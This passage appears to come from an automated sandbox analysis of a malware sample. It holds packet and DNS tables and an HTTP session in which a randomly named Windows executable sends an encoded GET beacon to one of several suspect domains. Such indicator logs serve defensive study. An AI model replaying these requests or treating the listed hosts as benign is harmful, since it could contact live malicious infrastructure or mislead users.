                                  Jul 13, 2024 00:07:51.194605112 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
                                  Jul 13, 2024 00:07:51.868599892 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
                                  Jul 13, 2024 00:07:51.868613005 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
                                  Jul 13, 2024 00:07:51.868884087 CEST | 49739 | 80 | 192.168.2.4 | 217.160.0.106
                                  Jul 13, 2024 00:07:52.690669060 CEST | 49739 | 80 | 192.168.2.4 | 217.160.0.106
                                  Jul 13, 2024 00:07:53.714004993 CEST | 49740 | 80 | 192.168.2.4 | 217.160.0.106
                                  Jul 13, 2024 00:07:53.720654964 CEST | 80 | 49740 | 217.160.0.106 | 192.168.2.4
                                  Jul 13, 2024 00:07:53.720774889 CEST | 49740 | 80 | 192.168.2.4 | 217.160.0.106
                                  Jul 13, 2024 00:07:53.722448111 CEST | 49740 | 80 | 192.168.2.4 | 217.160.0.106
                                  Jul 13, 2024 00:07:53.728666067 CEST | 80 | 49740 | 217.160.0.106 | 192.168.2.4
                                  Jul 13, 2024 00:07:54.387881041 CEST | 80 | 49740 | 217.160.0.106 | 192.168.2.4
                                  Jul 13, 2024 00:07:54.388294935 CEST | 80 | 49740 | 217.160.0.106 | 192.168.2.4
                                  Jul 13, 2024 00:07:54.388381004 CEST | 49740 | 80 | 192.168.2.4 | 217.160.0.106
                                  Jul 13, 2024 00:07:54.390310049 CEST | 49740 | 80 | 192.168.2.4 | 217.160.0.106
                                  Jul 13, 2024 00:07:54.395184040 CEST | 80 | 49740 | 217.160.0.106 | 192.168.2.4
                                  Jul 13, 2024 00:08:15.814943075 CEST | 49742 | 80 | 192.168.2.4 | 208.91.197.27
                                  Jul 13, 2024 00:08:15.820538044 CEST | 80 | 49742 | 208.91.197.27 | 192.168.2.4
                                  Jul 13, 2024 00:08:15.820667982 CEST | 49742 | 80 | 192.168.2.4 | 208.91.197.27
                                  Jul 13, 2024 00:08:15.823052883 CEST | 49742 | 80 | 192.168.2.4 | 208.91.197.27
                                  Jul 13, 2024 00:08:15.828536034 CEST | 80 | 49742 | 208.91.197.27 | 192.168.2.4
                                  Jul 13, 2024 00:08:16.298547029 CEST | 80 | 49742 | 208.91.197.27 | 192.168.2.4
                                  Jul 13, 2024 00:08:16.298667908 CEST | 49742 | 80 | 192.168.2.4 | 208.91.197.27
                                  Jul 13, 2024 00:08:17.331031084 CEST | 49742 | 80 | 192.168.2.4 | 208.91.197.27
                                  Jul 13, 2024 00:08:17.335799932 CEST | 80 | 49742 | 208.91.197.27 | 192.168.2.4
                                  Jul 13, 2024 00:08:18.349021912 CEST | 49743 | 80 | 192.168.2.4 | 208.91.197.27
                                  Jul 13, 2024 00:08:18.353821039 CEST | 80 | 49743 | 208.91.197.27 | 192.168.2.4
                                  Jul 13, 2024 00:08:18.353894949 CEST | 49743 | 80 | 192.168.2.4 | 208.91.197.27
                                  Jul 13, 2024 00:08:18.355432034 CEST | 49743 | 80 | 192.168.2.4 | 208.91.197.27
                                  Jul 13, 2024 00:08:18.360166073 CEST | 80 | 49743 | 208.91.197.27 | 192.168.2.4
                                  Jul 13, 2024 00:08:18.804871082 CEST | 80 | 49743 | 208.91.197.27 | 192.168.2.4
                                  Jul 13, 2024 00:08:18.804950953 CEST | 49743 | 80 | 192.168.2.4 | 208.91.197.27
                                  Jul 13, 2024 00:08:19.862484932 CEST | 49743 | 80 | 192.168.2.4 | 208.91.197.27
                                  Jul 13, 2024 00:08:19.869966030 CEST | 80 | 49743 | 208.91.197.27 | 192.168.2.4
                                  Jul 13, 2024 00:08:20.880863905 CEST | 49744 | 80 | 192.168.2.4 | 208.91.197.27
                                  Jul 13, 2024 00:08:20.888102055 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
                                  Jul 13, 2024 00:08:20.888235092 CEST | 49744 | 80 | 192.168.2.4 | 208.91.197.27
                                  Jul 13, 2024 00:08:20.893178940 CEST | 49744 | 80 | 192.168.2.4 | 208.91.197.27
                                  Jul 13, 2024 00:08:20.900135994 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
                                  Jul 13, 2024 00:08:20.900166988 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
                                  Jul 13, 2024 00:08:20.900218010 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
                                  Jul 13, 2024 00:08:20.900245905 CEST8049744208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:20.900274038 CEST8049744208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:20.900302887 CEST8049744208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:20.900525093 CEST8049744208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:20.902533054 CEST8049744208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:20.902561903 CEST8049744208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:21.345302105 CEST8049744208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:21.345417023 CEST4974480192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:22.409369946 CEST4974480192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:22.420100927 CEST8049744208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:23.427423954 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:23.626410007 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:23.626501083 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:23.628108978 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:23.635143995 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.762509108 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.762561083 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.762598991 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.762635946 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.762665987 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.762684107 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.762696028 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.762717962 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.762757063 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.762790918 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.762871981 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.762901068 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.762916088 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.763070107 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.763113976 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.772265911 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.772306919 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.772342920 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.772370100 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.772878885 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.772927999 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.773050070 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.815368891 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.850358963 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.850470066 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.850507975 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.850523949 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.850661039 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.850712061 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.850716114 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.850754023 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.850811005 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.851521015 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.851577044 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.851610899 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.851634979 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.852193117 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.852266073 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.852304935 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.852314949 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.852349997 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.853084087 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.853163958 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.853199959 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.853210926 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.853977919 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.854021072 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.854032040 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.854067087 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.854105949 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.854823112 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.854918003 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.854952097 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.854965925 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.855784893 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.855911970 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.855957985 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.911215067 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.912280083 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.912327051 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.914305925 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.921427965 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:39.487592936 CEST4974680192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:39.495687008 CEST804974643.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:39.495791912 CEST4974680192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:39.497873068 CEST4974680192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:39.505017996 CEST804974643.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:40.429691076 CEST804974643.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:40.429725885 CEST804974643.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:40.429739952 CEST804974643.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:40.429812908 CEST4974680192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:40.429812908 CEST4974680192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:41.003001928 CEST4974680192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:42.021399021 CEST4974780192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:42.028299093 CEST804974743.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:42.028400898 CEST4974780192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:42.029982090 CEST4974780192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:42.036551952 CEST804974743.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:42.918051958 CEST804974743.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:42.918104887 CEST804974743.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:42.918291092 CEST4974780192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:43.534235954 CEST4974780192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:44.553004026 CEST4974880192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:44.559801102 CEST804974843.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:44.559904099 CEST4974880192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:44.561718941 CEST4974880192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:44.568802118 CEST804974843.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:44.568835020 CEST804974843.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:44.568864107 CEST804974843.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:44.568896055 CEST804974843.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:44.568923950 CEST804974843.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:44.569706917 CEST804974843.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:44.569899082 CEST804974843.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:44.569928885 CEST804974843.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:44.569979906 CEST804974843.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:45.422015905 CEST804974843.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:45.422080994 CEST804974843.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:45.422259092 CEST4974880192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:46.065521955 CEST4974880192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:47.090790033 CEST4974980192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:47.097687006 CEST804974943.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:47.097788095 CEST4974980192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:47.099536896 CEST4974980192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:47.105922937 CEST804974943.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:47.967788935 CEST804974943.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:47.967919111 CEST804974943.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:47.968311071 CEST4974980192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:47.970058918 CEST4974980192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:47.976073980 CEST804974943.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:53.085059881 CEST4975080192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:53.089955091 CEST8049750194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:53.090027094 CEST4975080192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:53.091829062 CEST4975080192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:53.097464085 CEST8049750194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:53.728615999 CEST8049750194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:53.728641987 CEST8049750194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:53.728660107 CEST8049750194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:53.728758097 CEST8049750194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:53.728774071 CEST8049750194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:53.728775978 CEST4975080192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:53.728854895 CEST8049750194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:53.728856087 CEST4975080192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:53.728910923 CEST4975080192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:54.596812010 CEST4975080192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:55.615408897 CEST4975180192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:55.620424032 CEST8049751194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:55.620512962 CEST4975180192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:55.622361898 CEST4975180192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:55.627154112 CEST8049751194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:56.262490034 CEST8049751194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:56.262523890 CEST8049751194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:56.262542009 CEST8049751194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:56.262557030 CEST8049751194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:56.262574911 CEST8049751194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:56.262589931 CEST8049751194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:56.262604952 CEST4975180192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:56.262634993 CEST4975180192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:56.262634993 CEST4975180192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:57.128690004 CEST4975180192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:58.146394968 CEST4975280192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:58.153675079 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.153980970 CEST4975280192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:58.156059027 CEST4975280192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:58.163325071 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.163364887 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.163398027 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.163429022 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.163456917 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.164839029 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.164869070 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.164902925 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.164932013 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.809704065 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.809750080 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.809787035 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.809823036 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.809855938 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.809880018 CEST4975280192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:58.809891939 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.809921980 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.809932947 CEST4975280192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:58.809962034 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.810005903 CEST4975280192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:59.659288883 CEST4975280192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:09:00.677875042 CEST4975380192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:09:00.684194088 CEST8049753194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:09:00.684274912 CEST4975380192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:09:00.686052084 CEST4975380192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:09:00.693044901 CEST8049753194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:09:01.325706005 CEST8049753194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:09:01.325731993 CEST8049753194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:09:01.325745106 CEST8049753194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:09:01.325761080 CEST8049753194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:09:01.325776100 CEST8049753194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:09:01.325792074 CEST8049753194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:09:01.325804949 CEST8049753194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:09:01.325896978 CEST8049753194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:09:01.325923920 CEST4975380192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:09:01.325998068 CEST4975380192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:09:01.325998068 CEST4975380192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:09:01.330343962 CEST4975380192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:09:01.337613106 CEST8049753194.9.94.85192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 13, 2024 00:07:30.325550079 CEST | 64347 | 53 | 192.168.2.4 | 1.1.1.1
Jul 13, 2024 00:07:30.354027987 CEST | 53 | 64347 | 1.1.1.1 | 192.168.2.4
Jul 13, 2024 00:07:46.083853960 CEST | 57345 | 53 | 192.168.2.4 | 1.1.1.1
Jul 13, 2024 00:07:46.109668016 CEST | 53 | 57345 | 1.1.1.1 | 192.168.2.4
Jul 13, 2024 00:07:59.397193909 CEST | 53434 | 53 | 192.168.2.4 | 1.1.1.1
Jul 13, 2024 00:07:59.407500029 CEST | 53 | 53434 | 1.1.1.1 | 192.168.2.4
Jul 13, 2024 00:08:07.474450111 CEST | 54795 | 53 | 192.168.2.4 | 1.1.1.1
Jul 13, 2024 00:08:07.488152027 CEST | 53 | 54795 | 1.1.1.1 | 192.168.2.4
Jul 13, 2024 00:08:15.554599047 CEST | 61142 | 53 | 192.168.2.4 | 1.1.1.1
Jul 13, 2024 00:08:15.812743902 CEST | 53 | 61142 | 1.1.1.1 | 192.168.2.4
Jul 13, 2024 00:08:30.928488016 CEST | 62388 | 53 | 192.168.2.4 | 1.1.1.1
Jul 13, 2024 00:08:30.941900015 CEST | 53 | 62388 | 1.1.1.1 | 192.168.2.4
Jul 13, 2024 00:08:39.006345987 CEST | 50270 | 53 | 192.168.2.4 | 1.1.1.1
Jul 13, 2024 00:08:39.485043049 CEST | 53 | 50270 | 1.1.1.1 | 192.168.2.4
Jul 13, 2024 00:08:52.975266933 CEST | 62212 | 53 | 192.168.2.4 | 1.1.1.1
Jul 13, 2024 00:08:53.082964897 CEST | 53 | 62212 | 1.1.1.1 | 192.168.2.4
Jul 13, 2024 00:09:06.755645037 CEST | 49715 | 53 | 192.168.2.4 | 1.1.1.1
Jul 13, 2024 00:09:06.930857897 CEST | 53 | 49715 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 13, 2024 00:07:30.325550079 CEST | 192.168.2.4 | 1.1.1.1 | 0x94fb | Standard query (0) | www.hprlz.cz | A (IP address) | IN (0x0001) | false
Jul 13, 2024 00:07:46.083853960 CEST | 192.168.2.4 | 1.1.1.1 | 0x91f | Standard query (0) | www.catherineviskadi.com | A (IP address) | IN (0x0001) | false
Jul 13, 2024 00:07:59.397193909 CEST | 192.168.2.4 | 1.1.1.1 | 0xfb6e | Standard query (0) | www.hatercoin.online | A (IP address) | IN (0x0001) | false
Jul 13, 2024 00:08:07.474450111 CEST | 192.168.2.4 | 1.1.1.1 | 0xbaf7 | Standard query (0) | www.fourgrouw.cfd | A (IP address) | IN (0x0001) | false
Jul 13, 2024 00:08:15.554599047 CEST | 192.168.2.4 | 1.1.1.1 | 0xea58 | Standard query (0) | www.bfiworkerscomp.com | A (IP address) | IN (0x0001) | false
Jul 13, 2024 00:08:30.928488016 CEST | 192.168.2.4 | 1.1.1.1 | 0x60f2 | Standard query (0) | www.tinmapco.com | A (IP address) | IN (0x0001) | false
Jul 13, 2024 00:08:39.006345987 CEST | 192.168.2.4 | 1.1.1.1 | 0xab47 | Standard query (0) | www.xn--fhq1c541j0zr.com | A (IP address) | IN (0x0001) | false
Jul 13, 2024 00:08:52.975266933 CEST | 192.168.2.4 | 1.1.1.1 | 0x9d3d | Standard query (0) | www.xn--matfrmn-jxa4m.se | A (IP address) | IN (0x0001) | false
Jul 13, 2024 00:09:06.755645037 CEST | 192.168.2.4 | 1.1.1.1 | 0x513f | Standard query (0) | www.anuts.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 13, 2024 00:07:30.354027987 CEST | 1.1.1.1 | 192.168.2.4 | 0x94fb | No error (0) | www.hprlz.cz |  | 5.44.111.162 | A (IP address) | IN (0x0001) | false
Jul 13, 2024 00:07:46.109668016 CEST | 1.1.1.1 | 192.168.2.4 | 0x91f | No error (0) | www.catherineviskadi.com |  | 217.160.0.106 | A (IP address) | IN (0x0001) | false
Jul 13, 2024 00:07:59.407500029 CEST | 1.1.1.1 | 192.168.2.4 | 0xfb6e | Name error (3) | www.hatercoin.online | none | none | A (IP address) | IN (0x0001) | false
Jul 13, 2024 00:08:07.488152027 CEST | 1.1.1.1 | 192.168.2.4 | 0xbaf7 | Name error (3) | www.fourgrouw.cfd | none | none | A (IP address) | IN (0x0001) | false
Jul 13, 2024 00:08:15.812743902 CEST | 1.1.1.1 | 192.168.2.4 | 0xea58 | No error (0) | www.bfiworkerscomp.com |  | 208.91.197.27 | A (IP address) | IN (0x0001) | false
Jul 13, 2024 00:08:30.941900015 CEST | 1.1.1.1 | 192.168.2.4 | 0x60f2 | Name error (3) | www.tinmapco.com | none | none | A (IP address) | IN (0x0001) | false
Jul 13, 2024 00:08:39.485043049 CEST | 1.1.1.1 | 192.168.2.4 | 0xab47 | No error (0) | www.xn--fhq1c541j0zr.com |  | 43.252.167.188 | A (IP address) | IN (0x0001) | false
Jul 13, 2024 00:08:53.082964897 CEST | 1.1.1.1 | 192.168.2.4 | 0x9d3d | No error (0) | www.xn--matfrmn-jxa4m.se |  | 194.9.94.85 | A (IP address) | IN (0x0001) | false
Jul 13, 2024 00:08:53.082964897 CEST | 1.1.1.1 | 192.168.2.4 | 0x9d3d | No error (0) | www.xn--matfrmn-jxa4m.se |  | 194.9.94.86 | A (IP address) | IN (0x0001) | false
Jul 13, 2024 00:09:06.930857897 CEST | 1.1.1.1 | 192.168.2.4 | 0x513f | No error (0) | www.anuts.top |  | 23.251.54.212 | A (IP address) | IN (0x0001) | false
                                  • www.hprlz.cz
                                  • www.catherineviskadi.com
                                  • www.bfiworkerscomp.com
                                  • www.xn--fhq1c541j0zr.com
                                  • www.xn--matfrmn-jxa4m.se
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 5.44.111.162 | 80 | 4484 | C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
Timestamp | Bytes transferred | Direction | Data
Jul 13, 2024 00:07:30.369421959 CEST | 505 | OUT | GET /w6qg/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo= HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Host: www.hprlz.cz
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Jul 13, 2024 00:07:31.044356108 CEST | 743 | IN | HTTP/1.1 301 Moved Permanently
                                  Server: nginx
                                  Date: Fri, 12 Jul 2024 22:07:30 GMT
                                  Content-Type: text/html; charset=iso-8859-1
                                  Content-Length: 386
                                  Connection: close
                                  Location: https://www.hprlz.cz/w6qg/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo=
